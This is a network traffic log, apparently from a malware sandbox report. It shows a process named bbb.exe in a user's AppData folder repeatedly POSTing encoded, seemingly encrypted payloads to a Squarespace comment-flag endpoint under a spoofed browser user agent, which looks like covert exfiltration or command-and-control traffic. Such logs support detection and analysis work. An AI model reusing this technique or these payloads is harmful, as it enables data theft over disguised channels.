2024-09-01 19:56:58 UTC	16306	OUT	Data Raw: 73 67 65 4e 4a 4d 61 69 43 30 38 6d 4f 55 69 48 51 6d 49 48 47 6c 64 62 6f 4c 6c 71 33 39 74 4a 25 32 42 64 43 52 64 41 76 42 71 36 57 4f 63 33 74 79 6c 73 4d 4a 6e 30 61 4c 62 71 72 6c 76 5a 49 45 6f 32 32 49 38 41 2f 7a 25 32 42 66 78 2f 47 6b 55 79 57 55 58 6f 69 75 67 2f 4d 52 67 73 67 49 51 79 25 32 42 6b 61 6f 39 41 57 6a 43 4f 34 55 57 38 65 55 2f 49 4e 66 76 7a 34 66 6c 65 41 41 57 67 48 33 47 59 57 71 54 2f 61 53 49 53 78 57 4a 54 6b 57 45 58 4d 6c 78 30 2f 25 32 42 49 68 55 50 4c 76 2f 50 43 72 70 70 59 64 37 59 72 47 76 41 58 30 70 66 54 78 61 38 61 79 35 6a 4c 44 34 5a 44 79 58 76 56 71 70 79 6a 62 57 69 2f 4d 34 4e 2f 38 54 49 73 70 39 42 42 39 4b 58 31 33 32 38 6b 30 39 74 73 7a 6c 37 32 58 6c 4f 42 34 52 47 67 72 25 32 42 72 39 6d 6c 52 35 Data Ascii: sgeNJMaiC08mOUiHQmIHGldboLlq39tJ%2BdCRdAvBq6WOc3tylsMJn0aLbqrlvZIEo22I8A/z%2Bfx/GkUyWUXoiug/MRgsgIQy%2Bkao9AWjCO4UW8eU/INfvz4fleAAWgH3GYWqT/aSISxWJTkWEXMlx0/%2BIhUPLv/PCrppYd7YrGvAX0pfTxa8ay5jLD4ZDyXvVqpyjbWi/M4N/8TIsp9BB9KX1328k09tszl72XlOB4RGgr%2Br9mlR5
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 6e Data Ascii: n
2024-09-01 19:56:58 UTC	16306	OUT	Data Raw: 76 49 55 6a 44 51 53 59 4c 4a 78 52 69 57 45 5a 44 6c 32 4c 42 4b 6a 33 50 46 59 76 74 72 54 45 61 76 61 43 52 36 62 7a 52 4a 39 52 69 63 6a 39 48 4c 54 37 65 47 48 61 49 49 48 69 55 74 4a 65 6a 32 5a 2f 54 43 74 6f 57 7a 67 36 6f 4c 57 70 6c 35 65 42 42 4a 54 68 32 4c 4a 51 4c 33 51 6b 70 4e 4a 53 4e 77 76 62 35 44 36 59 72 37 36 4b 64 76 37 78 49 39 2f 74 53 6a 43 7a 35 62 39 71 31 78 41 2f 52 36 44 42 6d 67 65 52 38 51 6e 55 4c 72 5a 75 2f 74 51 55 33 48 66 68 74 52 6b 42 31 75 33 6d 48 59 25 32 42 49 41 4b 58 64 6f 37 42 4f 59 25 32 42 61 75 56 67 70 6c 6e 78 5a 43 67 30 78 32 36 66 65 7a 6d 4c 42 51 54 53 74 33 71 62 4f 6f 64 58 75 44 74 55 4d 4a 78 4b 43 4d 4a 6c 71 30 5a 6b 44 7a 31 41 6a 4e 77 32 32 59 61 77 73 61 79 72 48 54 25 32 42 33 79 42 55 Data Ascii: vIUjDQSYLJxRiWEZDl2LBKj3PFYvtrTEavaCR6bzRJ9Ricj9HLT7eGHaIIHiUtJej2Z/TCtoWzg6oLWpl5eBBJTh2LJQL3QkpNJSNwvb5D6Yr76Kdv7xI9/tSjCz5b9q1xA/R6DBmgeR8QnULrZu/tQU3HfhtRkB1u3mHY%2BIAKXdo7BOY%2BauVgplnxZCg0x26fezmLBQTSt3qbOodXuDtUMJxKCMJlq0ZkDz1AjNw22YawsayrHT%2B3yBU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	49867	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:57 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:58 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	49873	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:58 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:58 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRJF_roLdNMaZjQ0MDAzOGQxOWM4ZjJhMmViOGQzMzc5NzJhNTE3; Path=/; Secure Set-Cookie: crumb=BduXAayRmBogYTMyZDFkNWU2YjQwZjA3NzFhYWJmZGY5ZDRmYzdi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: LDIyMrfL/8GaMgSro Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BduXAayRmBogYTMyZDFkNWU2YjQwZjA3NzFhYWJmZGY5ZDRmYzdi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49871	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:58 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:58 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:58 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:58 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:58 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfwFGptSBDl6NDJkZTY4MTVjM2ZkNGFmOWM0N2FkOGUwNjRkN2Jh; Path=/; Secure Set-Cookie: crumb=BWfcVprM5YsINmYyZGE5YTQ0NjU3MjdkNjgzZWY0ZjNlN2U2Njc3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Er2e0Zar/onzOpEyf Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWfcVprM5YsINmYyZGE5YTQ0NjU3MjdkNjgzZWY0ZjNlN2U2Njc3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49874	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:59 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:59 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZdzog2864INYWQ2YTM0NTI5ZDk2Y2Q2NGQyYWY5OTMxNzFkYzky; Path=/; Secure Set-Cookie: crumb=BfvVT6M-ZZWKZjA3ZDI0ZDQxZGM5OGMwMGQzNTRmMjczMjk1OGM0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: juNtgplu/ECwgpDvr Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfvVT6M-ZZWKZjA3ZDI0ZDQxZGM5OGMwMGQzNTRmMjczMjk1OGM0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49875	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:59 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 324 Expect: 100-continue
2024-09-01 19:56:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:59 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:59 UTC	323	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 4d 45 55 47 52 39 25 32 42 71 47 73 78 48 4f 6a 68 44 73 71 6f 64 74 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjMEUGR9%2BqGsxHOjhDsqodtZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi3
2024-09-01 19:56:59 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:59 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaZXK_G7EyG_ODRiMGUxNGEzMWM4ZGQyMTZmZjZhODUwYzFhMzMy; Path=/; Secure Set-Cookie: crumb=BRezsoxTsQgWMzcyNDdlMTI3NWQzYThmZGMxYjZlNmFiMzhlZTIw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: tQ8wKA3q/29jZzLS4 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRezsoxTsQgWMzcyNDdlMTI3NWQzYThmZGMxYjZlNmFiMzhlZTIw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	49876	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:00 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:00 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	49877	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:00 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	49878	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:00 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:00 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:00 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:00 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:00 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:00 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bbzl_koDrYiuZDkzODE5YjhiZjhiMDFhZWQwZmMyZmExYWZiNjQy; Path=/; Secure Set-Cookie: crumb=Bau39j7u-HrBNGZmNTJlYzIxYzcxMGM2OTZlNDQ3OWMwNTEyMGVm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: gtblrf2G/yLDaBGRp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bau39j7u-HrBNGZmNTJlYzIxYzcxMGM2OTZlNDQ3OWMwNTEyMGVm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	49879	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:01 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:57:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:57:01 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:57:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:57:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRnYbGJ6Oxe6MzA1NWEyNGI0OGFiMGZlNzU3NjMxYjFjZGQxOThl; Path=/; Secure Set-Cookie: crumb=BeYIXOck-mGrNDEyOGE3NzMwZDQzNDBmNjkzMDJmMGJlMTlkMmVh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: pwsIk9C6/9DK6Mi3W Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeYIXOck-mGrNDEyOGE3NzMwZDQzNDBmNjkzMDJmMGJlMTlkMmVh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49880	198.185.159.177	443

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:57:01 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108350 Expect: 100-continue
2024-09-01 19:57:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:57:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
